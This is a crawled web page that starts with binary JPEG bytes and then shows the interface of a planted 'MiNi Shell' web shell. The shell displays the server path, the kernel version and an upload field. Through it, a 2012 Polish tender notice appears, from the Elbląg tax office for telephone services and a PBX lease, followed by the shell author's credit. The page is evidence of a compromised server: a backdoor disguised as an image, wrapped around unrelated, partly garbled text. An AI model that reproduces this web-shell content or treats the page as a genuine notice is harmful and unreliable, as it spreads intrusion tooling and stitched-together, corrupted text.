JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120606/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120606/191090-N-2012.html

<p class="kh_header"><b>Elbląg: Świadczenie usług telefonicznych wraz z dzierżawą  cyfrowej centrali telefonicznej dla potrzeb Urzędu Skarbowego w Elblągu w okresie 48 miesięcy.</b><br>
<b>Numer ogłoszenia: 191090 - 2012; data zamieszczenia: 06.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Skarbowy w Elblągu , ul. Adama Mickiewicza 43, 82-300 Elbląg, woj. warmińsko-mazurskie, tel. 55 611 56 00, faks 55 611 57 43.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.uselblag.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług telefonicznych wraz z dzierżawą  cyfrowej centrali telefonicznej dla potrzeb Urzędu Skarbowego w Elblągu w okresie 48 miesięcy..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Świadczenie usług telefonicznych wraz z dzierżawą  cyfrowej centrali telefonicznej dla potrzeb Urzędu Skarbowego w Elblągu w okresie 48 miesięcy.
OPIS PRZEDMIOTU ZAMÓWIENIA
1.Przedmiotem zamówienia jest świadczenie usług telefonicznych oraz dzierżawa dostarczonej, zainstalowanej, uruchomionej, administrowanej, serwisowanej i konserwowanej przez Wykonawcę cyfrowej centrali telefonicznej oraz innych urządzeń zapewniających właściwą realizację przedmiotowych usług, w tym urządzeń końcowych ( w szczególności aparatów telefonicznych, faksów).
2.Centrala oraz całe towarzyszące wyposażenie pozostaną własnością Wykonawcy przez cały okres obowiązywania umowy.
3.Wszystkie prace i nakłady związane z dostawą oraz instalacją centrali i urządzeń zapewniających właściwą realizację umowy będą kosztem Wykonawcy.
4.Wykonawca winien zapewnić następujące minimalne rozwiązania telekomunikacyjne:
automatyczne uzyskiwanie połączeń z numerami wewnętrznymi dla dzwoniących z zewnątrz
automatyczne uzyskiwanie połączeń z numerami wewnętrznymi i zewnętrznymi dla   dzwoniących z wewnątrz
stworzenie wewnętrznej, centralnej książki telefonicznej dla 250 abonentów
(książka wpisana do pamięci centrali tylko dla numerów wewnętrznych i dostępna dla wszystkich numerów wewnętrznych centrali)
funkcja centrali umożliwiająca prezentację numerów przychodzących na aparatach cyfrowych i analogowych
doprowadzenie 30 linii zewnętrznych
usługi pozwalające na kształtowanie uprawnień dla poszczególnych stacji na zlecenie Zamawiającego w fazie uruchamiania usługi oraz w trakcie jej trwania
naliczanie sekundowe,
zdalny nadzór , administrację i włączanie awaryjne
zasilanie podstawowe i awaryjne (przynajmniej 8 godzin)
system łączności bezprzewodowej
zachowanie dotychczas używanej numeracji miejskiej (55 611 56 00 - 55 611 57 99 - dwie pierwsze cyfry prefiksu, następne 4 cyfry numeru podstawowego do Urzędu Skarbowego, ostatnie 3 cyfry to odpowiedni numer wewnętrzny) z opcją wykorzystania numerów przy bezpośrednich połączeniach z zewnątrz   
5.Wykonawca zapewni wyposażenie Urzędu Skarbowy w Elblągu w:
centralę abonencką cyfrową (nie starszą niż 5 lat) PRA 30 B + D zarządzaną przez operatora sieci obsługującej min. 200 abonentów,zamawiający wymaga, aby centrala posiadała następującą ilość portów  wewnętrznych: 
	 - min. 120 portów analogowych
- min. 40 portów cyfrowych
- min. 27 stacji końcowych DECT
Pozostałą ilość portów należy podzielić na porty analogowe i cyfrowe zgodnie z możliwościami centrali jaką zaoferuje Wykonawca.
baterie do zasilania awaryjnego,
stanowisko telefonistki 
stanowisko sekretarki 
terminal taryfikacyjno- administracyjny umożliwiający pełną taryfikację abonentów oraz  zarządzanie (minimalne wymagania dotyczące urządzeń do obsługi systemu: komputer, drukarka laserowa, monitor LCD, zasilacz, klawiatura, mysz, odpowiednie oprogramowanie),
aparaty telefoniczne (fabrycznie nowe):
1)aparaty bezprzewodowe o zasięgu wg wartości katalogowych min. 300 m (wewnątrz obiektu i na terenie przyległym) - 29 szt + odpowiednia ilość stacji bazowych , wyposażone w:
funkcję identyfikacji osoby dzwoniącej przed przyjęciem rozmowy wewnętrznej, czyli na wyświetlaczu musi pojawiać się nazwisko osoby dzwoniącej pobierane z książki telefonicznej centrali, a nie numer wewnętrzny telefonu, z którego ta osoba dzwoni, ( w przypadku rozmów zewnętrznych na wyświetlaczu musi pojawiać się numer telefonu dzwoniącego z zewnątrz - nie dotyczy numerów zastrzeżonych przez abonentów),
funkcję przejmowania rozmowy po określonej ilości dzwonków ze zintegrowanego z nim aparatu stacjonarnego cyfrowego pracującego w danym pomieszczeniu,
ładowarkę 
baterię będącej w stanie gotowości przez ok. 50 godzin
2)aparaty stacjonarne cyfrowe -25 szt., wyposażone w :
duży ekran wyświetlacza (minimum jeden wiersz po 20 znaków)
funkcję prowadzenia rozmów w trybie głośnomówiącym
funkcję umożliwiającą równoczesną obsługę kilku linii oraz nadzór i filtrowanie rozmów
funkcję połączenia poprzez wybranie nazwiska na klawiaturze połączona z dostępem do centralnej książki telefonicznej
funkcję identyfikacji osoby dzwoniącej przed odebraniem telefonu
regulację głośności
funkcję umożliwiającą przekierowywanie rozmów na numery wewnętrzne,
funkcję automatycznego przekierowywania połączeń na wskazany przez abonenta numer wewnętrzny,
funkcję rejestrującą  połączenia nieodebrane (minimum 10 połączeń),
3)aparaty stacjonarne cyfrowe -  8 szt., wyposażone w:
wyświetlacz
regulację głośności
funkcję identyfikacji osoby dzwoniącej przed odebraniem telefonu
funkcję umożliwiającą przekierowywanie rozmów na numery wewnętrzne,
funkcję automatycznego przekierowywania połączeń na wskazany przez abonenta numer wewnętrzny,
funkcję powrotu przekierowanych rozmów, 	
funkcję rejestrującą  połączenia nieodebrane (minimum 10 połączeń),
4)aparaty stacjonarne analogowe - 110 szt., wyposażone w:
wyświetlacz (funkcjonujący bez użycia baterii lub w przypadku konieczności stosowania baterii wykonawca jest zobowiązany zapewnić odpowiednią ilość baterii w okresie trwania umowy)
regulację głośności
funkcję prezentacji numeru
funkcję umożliwiającą przekierowywanie rozmów na numery wewnętrzne,
5)aparaty bezprzewodowe analogowe - 10 szt., wyposażone w:
wyświetlacz 
funkcję prezentacji numeru,
funkcję umożliwiającą przekierowywanie rozmów na numery wewnętrzne,
ładowarkę,
akumulatorki,			
6)telefaksy na papier ze słuchawką z bezpośrednim numerem - 3 szt., wyposażone w:
laserową technologię wydruku
funkcję głośnomówiącą
funkcję umożliwiającą przełączanie z numeru wewnętrznego.
7)aparat telefoniczny cyfrowy dla stanowiska telefonistki, wyposażony w:
duży ekran wyświetlacza (minimum 2 wiersze po 40 znaków)
funkcję prowadzenia rozmów w trybie głośnomówiącym
funkcję umożliwiającą równoczesną obsługę kilku linii oraz nadzór i filtrowanie rozmów
funkcję połączenia poprzez wybranie nazwiska na klawiaturze połączona z dostępem do centralnej książki telefonicznej
funkcję identyfikacji osoby dzwoniącej przed odebraniem telefonu
regulację głośności
funkcję umożliwiającą przekierowywanie rozmów na numery wewnętrzne,
funkcję automatycznego przekierowywania połączeń na wskazany przez abonenta numer wewnętrzny,
funkcję powrotu przekierowanych rozmów, 		
funkcję rejestrującą  połączenia nieodebrane,
8)zestaw sekretarsko-dyrektorski - cyfrowy, wyposażony w:
funkcję pracy w układzie szef-sekretarka,
duży ekran wyświetlacza (minimum 2 wiersze po 40 znaków),
funkcję podglądu zajętości dla minimum 3 linii,
funkcję prowadzenia rozmów w trybie głośnomówiącym
funkcję umożliwiającą równoczesną obsługę kilku linii oraz nadzór i filtrowanie rozmów
funkcję połączenia poprzez wybranie nazwiska na klawiaturze połączona z dostępem do centralnej książki telefonicznej
funkcję identyfikacji osoby dzwoniącej przed odebraniem telefonu
regulację głośności
funkcję rejestrującą  połączenia nieodebrane,
funkcję umożliwiającą przekierowywanie rozmów na numery wewnętrzne,
funkcję automatycznego przekierowywania połączeń na wskazany przez abonenta numer wewnętrzny,
funkcję powrotu przekierowanych rozmów.
6.Wykonawca jest zobowiązany dołączyć szczególnie do urządzeń końcowych instrukcje w języku polskim w wersji papierowej lub elektronicznej.
7.Wykonawca zapewni na wszystkich łączach telefonicznych naliczanie sekundowe rozmów bez opłaty za nawiązanie połączenia.
8.Ze względu na zapewnienie wysokiego poziomu stabilności i niezawodności centrala nie może być urządzeniem typu Softswitch.
9.Zamawiający dopuszcza następujące technologie doprowadzenia łączy telekomunikacyjnych: światłowodową, kablową.
10.Zamawiający nie dopuszcza świadczenia usług w technologii radiowej oraz VOIP.
11.Wykonawca zobowiązuje się bezpłatnie przeszkolić i nadać uprawnienia wyznaczonym przez Naczelnika Urzędu Skarbowego dwóm pracownikom do konfiguracji systemu na poziomie administrowania usługami i numerami wewnętrznymi systemu oraz wykonywania taryfikacji (bilingów).
12.W trakcie realizacji zamówienia konieczne jest zaoferowanie indywidualnego opiekuna zajmującego się bieżącą obsługą zamawiającego.
13.Zamawiający na życzenie Wykonawcy udostępni rzut budynku w siedzibie Zamawiającego.
14.Instalacja telefoniczne w obiekcie Urzędu jest wydzielona, została wykonana w 2003 r. do podłączenia urządzeń telefonicznych do centrali cyfrowej. W obiekcie funkcjonuje łączność bezprzewodowa typu DECT (instalacja jest własnością Urzędu, urządzenia są własnością operatora świadczącego usługi telefoniczne). Jeżeli przyjęte przez Wykonawcę rozwiązania będą wymagały zainstalowania urządzeń dla których nie będzie możliwe wykorzystanie istniejącej instalacji, wykonanie instalacji będzie kosztem Wykonawcy. Zamawiający nie przewiduje wykorzystania wewnętrznej własnej sieci komputerowej dla usług telefonicznych będących przedmiotem niniejszego postępowania.
15.Budynek Urzędu posiada 5 kondygnacji użytkowych: piwnica, parter, dwa piętra i poddasze.
16.Wymiary zewnętrzne budynku: wysokość - 18,98 m (plus kondygnacja podziemna - piwnica), długość - 57,52 m, szerokość - 13,79 m. 
17.Pozostałe informacje o budynku: 
ściany murowane, zewnętrzne z cegły ceramicznej pełnej, wewnętrzne z cegły ceramicznej pełnej i gazobetonu,
stropy międzykondygnacyjne gęstożebrowe, stalowo-ceramiczne,
dwie klatki schodowe wewnętrzne, żelbetowe,
więźba dachowa drewniana o ustroju kleszczowo-płatwiowym.
18.Działka, na której położony jest budynek nie przekracza wymiarów 50m x 100m..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 64.21.00.00-1, 64.21.42.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 48.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu dokonania oceny spełniania warunku posiadania uprawnień do wykonywania określonej działalności lub czynności wymaga się od wykonawcy:
a)załączenia podpisanego oświadczenia,  że spełnia wszystkie warunki określone przepisami art. 22 ust. 1  ustawy z 29 stycznia 2004r. Prawo zamówień publicznych (j.t. Dz. U. Z 2010 r., Nr 113, poz. 759 z późn. zm.),
b)posiadania aktualnego (na czas trwania umowy) wpisu do rejestru przedsiębiorców telekomunikacyjnych prowadzonego przez Prezesa Urzędu Komunikacji Elektronicznej (UKE), zgodnie z ustawą z dnia 16 lipca 2004 roku Prawo Telekomunikacyjne (Dz. U. Z 2004 r., Nr 171, poz. 1800 z późn. zm.).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu dokonania oceny spełniania warunku posiadania niezbędnej wiedzy i doświadczenia wymaga się od wykonawcy:
a)załączenia podpisanego oświadczenia,  że spełnia wszystkie warunki określone przepisami art. 22 ust. 1  ustawy z 29 stycznia 2004r. Prawo zamówień publicznych (j.t. Dz. U. Z 2010 r., Nr 113, poz. 759 z późn. zm.),
b)wykonania lub wykonywania usług w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy - w tym okresie, w tym co najmniej 3 odpowiadających swoim przedmiotem i wartością usłudze stanowiącej przedmiot zamówienia oraz posiadania dokumentów potwierdzających należyte wykonanie lub wykonywanie tych usług (referencje),</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu dokonania oceny spełniania warunku dysponowania odpowiednim potencjałem technicznym do wykonania zamówienia wymaga się od wykonawcy:
a)załączenia podpisanego oświadczenia,  że spełnia wszystkie warunki określone przepisami art. 22 ust. 1  ustawy z 29 stycznia 2004r. Prawo zamówień publicznych (j.t. Dz. U. Z 2010 r., Nr 113, poz. 759 z późn. zm.)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu dokonania oceny spełniania warunku dysponowania osobami zdolnymi do wykonania zamówienia wymaga się od wykonawcy:
a)załączenia podpisanego oświadczenia,  że spełnia wszystkie warunki określone przepisami art. 22 ust. 1  ustawy z 29 stycznia 2004r. Prawo zamówień publicznych (j.t. Dz. U. Z 2010 r., Nr 113, poz. 759 z późn. zm.)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu dokonania oceny spełniania warunku znajdowania się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia wymaga się od wykonawcy:
a)załączenia podpisanego oświadczenia,  że spełnia wszystkie warunki określone przepisami art. 22 ust. 1  ustawy z 29 stycznia 2004r. Prawo zamówień publicznych (j.t. Dz. U. z 2010 r., Nr 113, poz. 759 z późn. zm.)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, czyli oświadczenie o braku podstaw do wykluczenia.
2.Pełnomocnictwo lub pełnomocnictwa do reprezentowania wykonawcy, o ile ofertę składa pełnomocnik.
3.Informacja dotycząca wskazania części zamówienia, której wykonanie Wykonawca powierzy podwykonawcom - nie dotyczy wykonawców, którzy sami zrealizują przedmiot zamówienia,</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany postanowień zawartej umowy w przypadku korzystnych dla Zamawiającego zmian cen usług.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.uselblag.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Skarbowy w Elblągu
ul. Mickiewicza 43
82-300 Elbląg, pok. 121
tel. 55 611 57 37, faks 55 611 57 43.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.06.2012 godzina 11:15, miejsce: Urząd Skarbowy w Elblągu
ul. Mickiewicza 43
82-300 Elbląg, pok. 119.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com